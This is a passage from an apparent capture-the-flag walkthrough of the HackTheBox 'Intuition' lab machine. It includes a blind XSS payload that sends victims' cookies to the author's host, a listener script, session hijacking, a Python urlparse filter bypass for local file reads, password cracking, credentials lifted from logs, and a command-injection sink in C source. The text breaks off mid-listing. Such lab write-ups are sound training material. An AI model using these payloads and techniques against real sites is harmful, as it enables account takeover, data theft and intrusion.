Introduction

HackTheBox Intuition begins with a series of websites focused on document compression. There’s an authentication site, a bug reporting site, and an admin dashboard. I plan to exploit a cross-site scripting vulnerability in the bug report section to gain access first as a web developer, and then again as an admin.

In the admin dashboard, I’ll identify a file read vulnerability by leveraging a bug in Python’s urllib to export files as PDFs. This will allow me to access the FTP server using credentials I uncover, leading to a private SSH key.

I’ll discover the next user’s password in the Suricata logs due to misconfiguration. For root access, I’ll exploit some custom binaries designed to interact with Ansible, using both command injection and a bug in Ansible Galaxy.

In the Beyond Root section, I’ll demonstrate the unintended root step that first led to the box compromise, utilizing VNC access through Selenium Grid and executing a clever Docker escape using a low-privileged shell on the host.


HackTheBox Intuition Machine Synopsis

Intuition is a Hard Linux machine highlighting a CSRF (Cross-Site Request Forgery) attack during the initial foothold, along with several other intriguing attack vectors. To gain a foothold, you must first exploit a CSRF vulnerability, followed by exploiting [CVE-2023-24329](https://github.com/python/cpython/issues/102153) in the Python `urllib` module to access files on the server. This allows you to disclose the application's source code, leading to the discovery of credentials needed to access the FTP server via an LFI (Local File Inclusion) vulnerability. Once inside the box, you must perform log analysis to progress to the next user and code review combined with a small amount of scripting. To achieve root access, you need to reverse engineer and exploit a custom binary, which is then leveraged to exploit [CVE-2023-5115](https://nvd.nist.gov/vuln/detail/CVE-2023-5115), a path traversal attack in the Ansible automation platform.

Information Gathering and Scanning with Nmap

With nmap, we get the following output:

```
nmap -p 22,80 -sCV 10.10.11.15
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-03 10:52 EDT
Nmap scan report for 10.10.11.15
Host is up (0.097s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://comprezzor.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds
```

The site redirects to comprezzor.htb. Add it, along with the subdomains used in this walkthrough, to your /etc/hosts file:

```
10.10.11.15 comprezzor.htb auth.comprezzor.htb report.comprezzor.htb dashboard.comprezzor.htb
```

Blind XSS

Blind XSS is a sub-type of stored XSS in which you can't see the payload execute, or even confirm whether it was stored in the website's database.



If you navigate to report.comprezzor.htb, you will see the below report form where you can send support tickets:

The key takeaway from this page is the ticket workflow: they begin with the developers and can be escalated to the administrators.



Clicking the “Report a Bug” button redirects me to auth.comprezzor.htb if I’m not logged in. After logging in, I’m taken to a simple form where I can submit a report, which then displays another flash message above the form.

I'll submit the following XSS payload in the report form:

```
<img src="http://10.10.14.6/test.txt" onerror="fetch('http://10.10.14.6/test?cookie='+document.cookie)">
```

The payload adds an image whose source points to a file on my host that doesn't exist, so it fails to load.

Its onerror handler then runs JavaScript that exfiltrates the current user's cookie to my server.

This could result in up to two requests being sent back to me. The first request would indicate HTML injection, as the image tag is processed and attempts to load. When my server returns a 404 for test.txt, it triggers the JavaScript to send the cookie.

Before long, I receive four connections at my Python web server; the one carrying the cookie is:

```
10.10.11.15 - - [03/May/2024 13:55:17] "GET /test?cookie=user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4 HTTP/1.1" 404 -
```
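The walkthrough uses a plain Python web server, which logs the whole request line. As a hypothetical alternative, the sketch below extracts only the `cookie` query parameter from each request. `CookieLogger`, `extract_cookie`, and `serve` are illustrative names, and port 80 is assumed from the payload's `http://10.10.14.6/` URLs.

```python
"""Minimal HTTP listener that prints exfiltrated cookies (hypothetical helper)."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import unquote, urlparse


def extract_cookie(path: str) -> Optional[str]:
    """Return the raw value of the `cookie` query parameter, if present."""
    query = urlparse(path).query
    for part in query.split("&"):
        name, sep, value = part.partition("=")
        if name == "cookie" and sep:
            # unquote (not unquote_plus) so '+' characters from base64 survive
            return unquote(value)
    return None


class CookieLogger(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        cookie = extract_cookie(self.path)
        if cookie:
            print(f"[+] {self.client_address[0]} sent cookie: {cookie}")
        # Answer 404, as a static file server would for a missing file
        self.send_response(404)
        self.end_headers()


def serve(port: int = 80) -> None:
    """Start the listener; binding port 80 normally requires root."""
    HTTPServer(("0.0.0.0", port), CookieLogger).serve_forever()
```

Calling `serve()` starts the listener. Splitting the query by hand instead of using `parse_qs` is deliberate: `parse_qs` turns `+` into a space, which would corrupt a base64 cookie that the payload sends without URL encoding.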

The cookie value is base64-encoded. Decoding it reveals JSON user data, followed by a pipe and a 64-character hex string:

```
echo "eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4" | base64 -d
{"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8
```




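The cookie decoding can also be scripted. The sketch below assumes the format seen in the captured cookie: base64 of JSON claims, a `|`, then a hex string. Treating that hex string as a signature is an assumption (64 hex characters is consistent with a SHA-256-based MAC). If it is keyed with a server secret, the claims can't simply be edited, which is why stealing a complete cookie is the easier route. `decode_user_data` is a hypothetical helper name.

```python
import base64
import json
from typing import Any, Dict, Tuple


def decode_user_data(cookie_value: str) -> Tuple[Dict[str, Any], str]:
    """Split a user_data cookie into its JSON claims and trailing hex string.

    Assumes the observed layout: base64("<json>|<hex>").
    """
    # Accept the "user_data=" prefix as it appears in the exfiltrated query string
    if cookie_value.startswith("user_data="):
        cookie_value = cookie_value[len("user_data="):]
    # Restore any '=' padding that may have been dropped in transit
    padded = cookie_value + "=" * (-len(cookie_value) % 4)
    raw = base64.b64decode(padded).decode()
    # rpartition: the last '|' separates the claims from the signature
    claims, _, signature = raw.rpartition("|")
    return json.loads(claims), signature
```

Passing it the `user_data=...` value from the log above should return adam's claims and the hex string, matching the `base64 -d` output.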

Then use Firefox developer tools to update the cookie and refresh the dashboard page dashboard.comprezzor.htb:







There are five tickets on the dashboard. When I view one, it displays three buttons.

Clicking “Set High Priority” changes the value to 1, and the button then changes to “Set Low Priority.”

Tickets appear to be deleted fairly quickly once processed, but if I act fast, I can create a ticket and watch it appear on the dashboard.

Now go back to the report submission form and resubmit the previous XSS payload. Then open the dashboard again and set the new ticket to high priority. Shortly afterward, the admin's cookie arrives:

```
"GET /description?cookie=user_data=eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5 HTTP/1.1" 404 -
```

Decode with base64:

```
echo eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5 | base64 -d
{"user_id": 1, "username": "admin", "role": "admin"}|34822333d444ae0e4022f6cc679ac9d26d1d1d682c59c61cfbea29d776d589d9
```



Accessing the dashboard as admin:

The main page only displays the high-priority reports, while the “Full report list” shows all open tickets.

Clicking “Create a backup” sends a GET request to /backup, followed by a flash message. It’s unclear what this action accomplishes, and there doesn’t seem to be much I can interact with at the moment.

The “Create PDF report” option leads to /create_pdf_report, which prompts for a URL. If I attempt to provide one of the comprezzor.htb domains, it responds with “Invalid URL.” The same happens with URLs like file:///etc/passwd that would attempt to read files from the filesystem.

Running exiftool on a downloaded PDF shows that it was generated with wkhtmltopdf 0.12.6:

```
exiftool report_28760.pdf
```

CVE-2023-24329 Python-urllib

CVE-2023-24329 is a URL parsing flaw in Python's urllib.parse module. urlparse() does not strip leading blank characters, so a URL that begins with a space is parsed with an empty scheme and netloc. Code that validates URLs by checking the parsed scheme or host against a blocklist can therefore be bypassed.

Key Details:

- Type: Improper input validation (URL blocklist bypass)
- Impact: Filters built on urlparse() results can be bypassed, letting blocked schemes such as file:// or blocked hosts through.
- Affected Versions: Python before 3.11.4, with the fix backported to older maintained branches; check the official advisory for exact versions.

This is a straightforward bug: urllib.parse.urlparse doesn't correctly handle URLs that start with a space. To demonstrate, I'll use a Docker container running a vulnerable Python version (3.11.3):

```
docker run -it python:3.11.3 bash
Unable to find image 'python:3.11.3' locally
3.11.3: Pulling from library/python
bd73737482dd: Pull complete
6710592d62aa: Pull complete
75256935197e: Pull complete
c1e5026c6457: Pull complete
f0016544b8b9: Pull complete
1d58eee51ff2: Pull complete
93dc7b704cd1: Pull complete
caefdefa531e: Pull complete
Digest: sha256:3a619e3c96fd4c5fc5e1998fd4dcb1f1403eb90c4c6409c70d7e80b9468df7df
Status: Downloaded newer image for python:3.11.3
```

The application presumably parses the submitted URL with urlparse, then checks that the scheme is allowed and that the netloc isn't on a denylist; here, the file scheme appears to be blocked. In a Python shell inside the container, I'll import urlparse and try a few URLs:

```
python
Python 3.11.3 (main, May 23 2023, 13:25:46) [GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from urllib.parse import urlparse
>>> urlparse("https://motasem-notes.net")
ParseResult(scheme='https', netloc='motasem-notes.net', path='', params='', query='', fragment='')
>>> urlparse("file:///etc/passwd")
ParseResult(scheme='file', netloc='', path='/etc/passwd', params='', query='', fragment='')
>>> urlparse(" file:///etc/passwd")
ParseResult(scheme='', netloc='', path=' file:///etc/passwd', params='', query='', fragment='')
```

With a leading space, urlparse returns an empty scheme and netloc and treats the whole string as a path, so a scheme or netloc check has nothing to match. The same happens with any scheme, not just file. Putting this together, I'll submit " file:///etc/passwd" (with a leading space) to the site. The fetch itself still succeeds, presumably because the code that retrieves the URL strips the surrounding whitespace.
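To see why the leading space matters, here is a minimal sketch of the kind of check the application presumably performs, next to a hardened version that strips the input and allowlists schemes. The application's real filter is not shown at this point, so `BLOCKED_SCHEMES`, `BLOCKED_HOSTS`, and both function names are assumptions. On patched Python (3.11.4 and later), urlparse strips the leading whitespace itself, so there the naive check also rejects the bypass.

```python
from urllib.parse import urlparse

# Hypothetical denylists; the application's real rules are not shown here.
BLOCKED_SCHEMES = {"file"}
BLOCKED_HOSTS = {"comprezzor.htb", "auth.comprezzor.htb",
                 "report.comprezzor.htb", "dashboard.comprezzor.htb"}


def naive_is_allowed(url: str) -> bool:
    """Denylist check on the raw string; a leading space defeats it on Python < 3.11.4."""
    parsed = urlparse(url)
    return parsed.scheme not in BLOCKED_SCHEMES and parsed.hostname not in BLOCKED_HOSTS


def hardened_is_allowed(url: str) -> bool:
    """Strip first, then require an allowlisted scheme and a non-denylisted host."""
    parsed = urlparse(url.strip())
    return (parsed.scheme in {"http", "https"}
            and parsed.hostname is not None
            and parsed.hostname not in BLOCKED_HOSTS)


for candidate in ["file:///etc/passwd", " file:///etc/passwd", "http://10.10.14.6/"]:
    print(repr(candidate), naive_is_allowed(candidate), hardened_is_allowed(candidate))
```

The allowlist is the important design choice: an empty or unexpected scheme is rejected outright instead of slipping past a denylist. A complete SSRF defense would also need to check the resolved address (for example, loopback or internal ranges), which this sketch doesn't attempt.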



By fetching /proc/self/environ, it appears that the website is running as root and operating from /app, which suggests it might be in a Docker container, although it’s hard to confirm.



The /proc/self/cmdline reveals that it’s executing python3 /app/code/app.py. I’ll access /proc/self/cwd/code/app.py, which is a Flask application that registers routes using Blueprints, allowing for the organization of routes in different files.

At this point, I could investigate the authentication mechanism to understand the custom token, but since I’m already an admin on the site, I’m unsure what else I should pursue. I might also examine the main service to see how it compresses files and check for any potential command injection vulnerabilities.

One feature stands out: the dashboard's “backup” function, whose purpose was unclear earlier. Its route handler looks like this:

```python
@dashboard_bp.route('/backup', methods=['GET'])
@admin_required
def backup():
    source_directory = os.path.abspath(os.path.dirname(__file__) + '../../../')
    current_datetime = datetime.now().strftime("%Y%m%d%H%M%S")
    backup_filename = f'app_backup_{current_datetime}.zip'

    with zipfile.ZipFile(backup_filename, 'w', zipfile.ZIP_DEFLATED) as zipf:
        for root, _, files in os.walk(source_directory):
            for file in files:
                file_path = os.path.join(root, file)
                arcname = os.path.relpath(file_path, source_directory)
                zipf.write(file_path, arcname=arcname)

    try:
        ftp = FTP('ftp.local')
        ftp.login(user='ftp_admin', passwd='u3jai8y71s2')
        ftp.cwd('/')
        with open(backup_filename, 'rb') as file:
            ftp.storbinary(f'STOR {backup_filename}', file)
        ftp.quit()
        os.remove(backup_filename)
        flash('Backup and upload completed successfully!', 'success')
    except Exception as e:
        flash(f'Error: {str(e)}', 'error')

    return redirect(url_for('dashboard.dashboard'))
```

The /backup handler zips the application directory and uploads the archive over FTP to ftp.local using hardcoded credentials: ftp_admin / u3jai8y71s2.

Retrieving The SSH Key

Submit the following URL to the PDF report generator to list the FTP server's root directory:

```
ftp://ftp_admin:u3jai8y71s2@ftp.local/
```



You will see three files:

- private-8297.key
- welcome_note.pdf
- welcome_note.txt

You can then copy the SSH private key; welcome_note.txt also contains a password, which serves as the key's passphrase.

I'll save the key to a file, but I still need a username to connect. Because the key is encrypted, I can't read its comment directly, so I'll remove the passphrase with ssh-keygen -p:

```
ssh-keygen -p -f private-8297.key
```

This rewrites the key file in place without a passphrase (enter the note's password as the old passphrase and leave the new one empty). It also prints the key's comment, which usually contains the username of the key's creator. The comment can be read again later with ssh-keygen -l:

```
ssh-keygen -l -f private-8297.key
```

Next, connect as dev_acc (the unlocked key is saved here as ~/keys/intuition-dev_acc):

```
ssh -i ~/keys/intuition-dev_acc dev_acc@comprezzor.htb
```

From there the user flag is easy to get.

Linux Privilege Escalation

Enumerating the listening TCP ports with netstat:

```
netstat -tnlp
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 172.21.0.1:21           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:21            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:38737         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
```

I've already accessed FTP, though I'll want to check back if I get credentials for other users.

Enumerating the processes:

```
ps auxww
...[snip]...
root        1337  8.8  2.9 548512 115900 ?       Ssl  14:48  29:12 /usr/bin/suricata -D --af-packet -c /etc/suricata/suricata.yaml --pidfile /run/suricata.pid
...[snip]...
root        1581  0.6  0.1 1525128 5096 ?        Sl   14:48   2:10 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.21.0.2 -container-port 80
...[snip]...
root        1619  0.0  0.0 1229560 3712 ?        Sl   14:48   0:12 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 4444 -container-ip 172.21.0.4 -container-port 4444
...[snip]...
1200        1847  0.0  0.0  10104  3712 ?        S    14:48   0:00 bash /opt/bin/noVNC/utils/novnc_proxy --listen 7900 --vnc localhost:5900
```

Suricata, a network IDS, is running as root. One docker-proxy forwards 127.0.0.1:8080 to port 80 on a container at 172.21.0.2, presumably the web application server sitting behind nginx.

Another docker-proxy forwards 127.0.0.1:4444 to port 4444 on a container at 172.21.0.4. A noVNC proxy (listening on 7900 and pointing at VNC on localhost:5900) is also active.
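When the ps output is long, the container port forwards can be pulled out mechanically. The sketch below is a hypothetical helper that reads the `-host-ip`, `-host-port`, `-container-ip`, and `-container-port` arguments visible in the docker-proxy command lines above; it assumes that flag layout and is not a Docker API.

```python
import shlex
from typing import Dict, List


def parse_docker_proxy(cmdline: str) -> Dict[str, str]:
    """Extract the port mapping from a docker-proxy command line (or a ps line containing one)."""
    args = shlex.split(cmdline)
    opts: Dict[str, str] = {}
    # Pair each "-flag" with the token that follows it
    for flag, value in zip(args, args[1:]):
        if flag.startswith("-") and not value.startswith("-"):
            opts[flag.lstrip("-")] = value
    return {
        "proto": opts.get("proto", "?"),
        "host": f"{opts.get('host-ip', '?')}:{opts.get('host-port', '?')}",
        "container": f"{opts.get('container-ip', '?')}:{opts.get('container-port', '?')}",
    }


def port_forwards(ps_output: str) -> List[Dict[str, str]]:
    """Return one mapping per docker-proxy process in `ps auxww` output."""
    return [parse_docker_proxy(line) for line in ps_output.splitlines()
            if "docker-proxy" in line]
```

Applied to the two docker-proxy lines above, it yields 127.0.0.1:8080 → 172.21.0.2:80 and 127.0.0.1:4444 → 172.21.0.4:4444.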

The application has an unusual file system structure; typically, blueprints are used to organize routes separately from the main application, but this app seems to keep all related files within the various blueprint folders.

In the auth folder, there are files named users.db and users.sql.

```
dev_acc@intuition:/var/www/app/blueprints/auth$ ls
auth.py  auth_utils.py  __pycache__  users.db  users.sql
```

The users.db SQLite database can be opened with sqlite3, and its users table holds salted SHA-256 password hashes:

```
sqlite3 users.db
sqlite> .tables
users
sqlite> .headers on
sqlite> select * from users;
id|username|password|role
1|admin|sha256$nypGJ02XBnkIQK71$f0e11dc8ad21242b550cc8a3c27baaf1022b6522afaadbfa92bd612513e9b606|admin
2|adam|sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43|webdev
```
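These hashes look like the legacy Werkzeug `method$salt$hexdigest` format, in which the digest is HMAC-SHA256 of the password keyed with the salt. That is an assumption based on the `sha256$` prefix and the Flask stack. The sketch below shows how a candidate would be verified under that assumption; the function names are hypothetical.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def werkzeug_sha256(password: str, salt: str) -> str:
    """Build a 'sha256$salt$hexdigest' string (HMAC-SHA256 keyed with the salt)."""
    digest = hmac.new(salt.encode(), password.encode(), hashlib.sha256).hexdigest()
    return f"sha256${salt}${digest}"


def check_password(stored: str, candidate: str) -> bool:
    """Verify a candidate password against a 'sha256$salt$hexdigest' string."""
    method, salt, digest = stored.split("$", 2)
    if method != "sha256":
        raise ValueError(f"unsupported method: {method}")
    computed = hmac.new(salt.encode(), candidate.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison, as a real verifier should use
    return hmac.compare_digest(computed, digest)


def crack(stored: str, words: Iterable[str]) -> Optional[str]:
    """Return the first word that verifies, or None (slow and single-threaded)."""
    for word in words:
        if check_password(stored, word):
            return word
    return None
```

Feeding `crack()` the lines of a wordlist would test candidates the same way a cracker does, only much more slowly; hashcat is the practical tool here.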

Hash Cracking with Hashcat

With the hashes saved in username:hash form, hashcat in autodetect mode (with --user so it ignores the username field) cracks adam's password:

```
$ cat hashes
admin:sha256$nypGJ02XBnkIQK71$f0e11dc8ad21242b550cc8a3c27baaf1022b6522afaadbfa92bd612513e9b606
adam:sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43
$ hashcat hashes /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
```

The cracked credentials are adam / "adam gray" (the password contains a space). Keep them for later.

Additionally, check the Suricata logs:

```
dev_acc@intuition:/var/log/suricata$ ls
eve.json                      eve.json.4.gz  fast.log.1-2024040114.backup  fast.log.7.gz                 stats.log.1-2024042918.backup     suricata.log.1                    suricata.log.6.gz
eve.json.1                    eve.json.6.gz  fast.log.1-2024042213.backup  stats.log                     stats.log.4.gz                    suricata.log.1-2024040114.backup  suricata.log.7.gz
eve.json.1-2024040114.backup  eve.json.7.gz  fast.log.1-2024042918.backup  stats.log.1                   stats.log.6.gz                    suricata.log.1-2024042213.backup
eve.json.1-2024042213.backup  fast.log       fast.log.4.gz                 stats.log.1-2024040114.backup stats.log.7.gz                    suricata.log.1-2024042918.backup
eve.json.1-2024042918.backup  fast.log.1     fast.log.6.gz                 stats.log.1-2024042213.backup suricata.log                      suricata.log.4.gz
```

The files ending in .gz are compressed and can be read with zcat or zgrep. There's too much data to sift through manually, but searching for usernames shows “adam” only in some uninteresting HTTP logs, while “lopez” shows up in the FTP logs:

```
dev_acc@intuition:/var/log/suricata$ zgrep -i lopez *.gz
eve.json.7.gz:{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
eve.json.7.gz:{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"PASS","command_data":"Lopezzz1992%123","completion_code":["530"],"reply":["Authentication failed."],"reply_received":"yes"}}
eve.json.7.gz:{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
eve.json.7.gz:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}}
```

Suricata's FTP logging records the credentials in plaintext. The first login attempt, with Lopezzz1992%123, fails (530); the second, with Lopezz1992%123, succeeds (230).
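Rather than grepping for one username at a time, the FTP events can be paired up directly. USER and PASS arrive as separate eve.json events, and the `flow_id` field ties them to one session. The sketch below assumes the eve.json layout shown above; `ftp_logins` and `open_log` are hypothetical names.

```python
import gzip
import json
from pathlib import Path
from typing import Dict, Iterable, Iterator, Optional, Tuple, Union


def open_log(path: Path):
    """Open a plain or gzip-compressed eve.json file as text."""
    if path.suffix == ".gz":
        return gzip.open(path, "rt", encoding="utf-8", errors="replace")
    return path.open("r", encoding="utf-8", errors="replace")


def ftp_logins(paths: Iterable[Union[str, Path]]) -> Iterator[Tuple[str, Optional[str], str, str]]:
    """Yield (timestamp, user, password, completion_code) for every FTP PASS event."""
    users: Dict[int, str] = {}  # flow_id -> last USER seen in that session
    for path in paths:
        with open_log(Path(path)) as fh:
            for line in fh:
                try:
                    event = json.loads(line)
                except json.JSONDecodeError:
                    continue  # skip truncated or non-JSON lines
                if not isinstance(event, dict) or event.get("event_type") != "ftp":
                    continue
                ftp = event.get("ftp", {})
                flow = event.get("flow_id")
                if ftp.get("command") == "USER":
                    users[flow] = ftp.get("command_data")
                elif ftp.get("command") == "PASS":
                    codes = ftp.get("completion_code") or [""]
                    yield (event.get("timestamp"), users.get(flow),
                           ftp.get("command_data"), codes[0])
```

Pointed at the eve.json* files in /var/log/suricata, this would list every PASS attempt alongside its username and reply code, which surfaces both lopez logins above. From a defender's point of view, it also shows why plaintext protocols should not be logged at this level of detail.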

```
dev_acc@intuition:/var/log/suricata$ su - lopez
lopez@intuition:~$ sudo -l
[sudo] password for lopez:
Matching Defaults entries for lopez on intuition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User lopez may run the following commands on intuition:
    (ALL : ALL) /opt/runner2/runner2
```

From Lopez to Root

A few observations:

- The user lopez can run /opt/runner2/runner2 as root and is a member of the sys-adm group.
- That group grants access to both /opt/playbooks and /opt/runner2. The /opt/playbooks directory contains two files, but they aren't particularly noteworthy:

```
lopez@intuition:/opt$ ls playbooks/
apt_update.yml  inventory.ini
```

- The runner2 directory holds a binary of the same name, which lopez can run as root. Executing it prompts for a JSON file:

```
motasem@kali$ sshpass -p 'Lopezz1992%123' ssh lopez@comprezzor.htb
lopez@intuition:~$ sudo /opt/runner2/runner2
[sudo] password for lopez:
Usage: /opt/runner2/runner2 <json_file>
lopez@intuition:/tmp$ echo '{}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Run key missing or invalid.
```

We will come back to this later.

Remember the hash cracking above? adam's password also works on the local FTP server:

```
lopez@intuition:~$ ftp adam@localhost
Connected to localhost.
220 pyftpdlib 1.5.7 ready.
331 Username ok, send password.
Password:
230 Login successful.
ftp> ls
229 Entering extended passive mode (|||36671|).
125 Data connection already open. Transfer starting.
-rwxr-xr-x   1 root     1002          318 Apr 06 00:25 run-tests.sh
-rwxr-xr-x   1 root     1002        16744 Oct 19  2023 runner1
-rw-r--r--   1 root     1002         3815 Oct 19  2023 runner1.c
226 Transfer complete.
```

run-tests.sh is a Bash script, and runner1.c is the source code for runner1.

In runner1.c, there’s a variable called AUTH_KEY_HASH, defined as 0feda17076d793c2ef2870d7427ad4ed. The check_auth function takes an auth_key, MD5 hashes it, and compares it to this hash.

The usage documentation outlines three ways to run it: list, run, and install. I’ll try these with runner2.

- listPlaybooks checks the /opt/playbooks directory.

- runPlaybook executes a specified playbook using Ansible, but it can only run playbooks by their index in /opt/playbooks. Since I can’t write there, this might be a dead end.

- installRole constructs a string in the format “%s install %s”, where the second %s is user input. This appears to be a promising target for command injection, assuming the same applies to runner2.
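To make the injection point concrete, the sketch below mirrors installRole's string building in Python and contrasts it with passing an argument list, which never involves a shell. runner1 itself is C and calls system(), which runs the string through /bin/sh -c. All function names here are hypothetical, and `shell_tokens` only approximates how a POSIX shell splits the string.

```python
import shlex
import subprocess
from typing import List

ANSIBLE_GALAXY_BIN = "/usr/bin/ansible-galaxy"


def unsafe_install_command(role_url: str) -> str:
    # Same shape as runner1's snprintf("%s install %s"); system() hands this to /bin/sh -c
    return f"{ANSIBLE_GALAXY_BIN} install {role_url}"


def shell_tokens(command: str) -> List[str]:
    # Rough POSIX-shell tokenization that keeps operators such as ';' separate
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def safe_install_argv(role_url: str) -> List[str]:
    # With an argument vector there is no shell, so ';' is just part of the filename
    return [ANSIBLE_GALAXY_BIN, "install", role_url]


def install_role(role_url: str) -> int:
    # Hypothetical safe replacement for installRole(); not executed in the examples
    return subprocess.run(safe_install_argv(role_url), check=False).returncode
```

For `/tmp/test.tar;id`, the shell-string version ends in a separate `;` operator followed by `id`, while the argument-vector version keeps the whole value as one filename.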

The full runner1.c source:

```c
// Version : 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <openssl/md5.h>

#define INVENTORY_FILE "/opt/playbooks/inventory.ini"
#define PLAYBOOK_LOCATION "/opt/playbooks/"
#define ANSIBLE_PLAYBOOK_BIN "/usr/bin/ansible-playbook"
#define ANSIBLE_GALAXY_BIN "/usr/bin/ansible-galaxy"
#define AUTH_KEY_HASH "0feda17076d793c2ef2870d7427ad4ed"

int check_auth(const char* auth_key) {
    unsigned char digest[MD5_DIGEST_LENGTH];
    MD5((const unsigned char*)auth_key, strlen(auth_key), digest);

    char md5_str[33];
    for (int i = 0; i < 16; i++) {
        sprintf(&md5_str[i*2], "%02x", (unsigned int)digest[i]);
    }

    if (strcmp(md5_str, AUTH_KEY_HASH) == 0) {
        return 1;
    } else {
        return 0;
    }
}

void listPlaybooks() {
    DIR *dir = opendir(PLAYBOOK_LOCATION);
    if (dir == NULL) {
        perror("Failed to open the playbook directory");
        return;
    }

    struct dirent *entry;
    int playbookNumber = 1;

    while ((entry = readdir(dir)) != NULL) {
        if (entry->d_type == DT_REG && strstr(entry->d_name, ".yml") != NULL) {
            printf("%d: %s\n", playbookNumber, entry->d_name);
            playbookNumber++;
        }
    }

    closedir(dir);
}

void runPlaybook(const char *playbookName) {
    char run_command[1024];
    snprintf(run_command, sizeof(run_command), "%s -i %s %s%s", ANSIBLE_PLAYBOOK_BIN, INVENTORY_FILE, PLAYBOOK_LOCATION, playbookName);
    system(run_command);
}

void installRole(const char *roleURL) {
    char install_command[1024];
    snprintf(install_command, sizeof(install_command), "%s install %s", ANSIBLE_GALAXY_BIN, roleURL);
    system(install_command);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s [list|run playbook_number|install role_url] -a <auth_key>\n", argv[0]);
        return 1;
    }

    int auth_required = 0;
    char auth_key[128];

    for (int i = 2; i < argc; i++) {
        if (strcmp(argv[i], "-a") == 0) {
            if (i + 1 < argc) {
                strncpy(auth_key, argv[i + 1], sizeof(auth_key));
                auth_required = 1;
                break;
            } else {
                printf("Error: -a option requires an auth key.\n");
                return 1;
            }
        }
    }

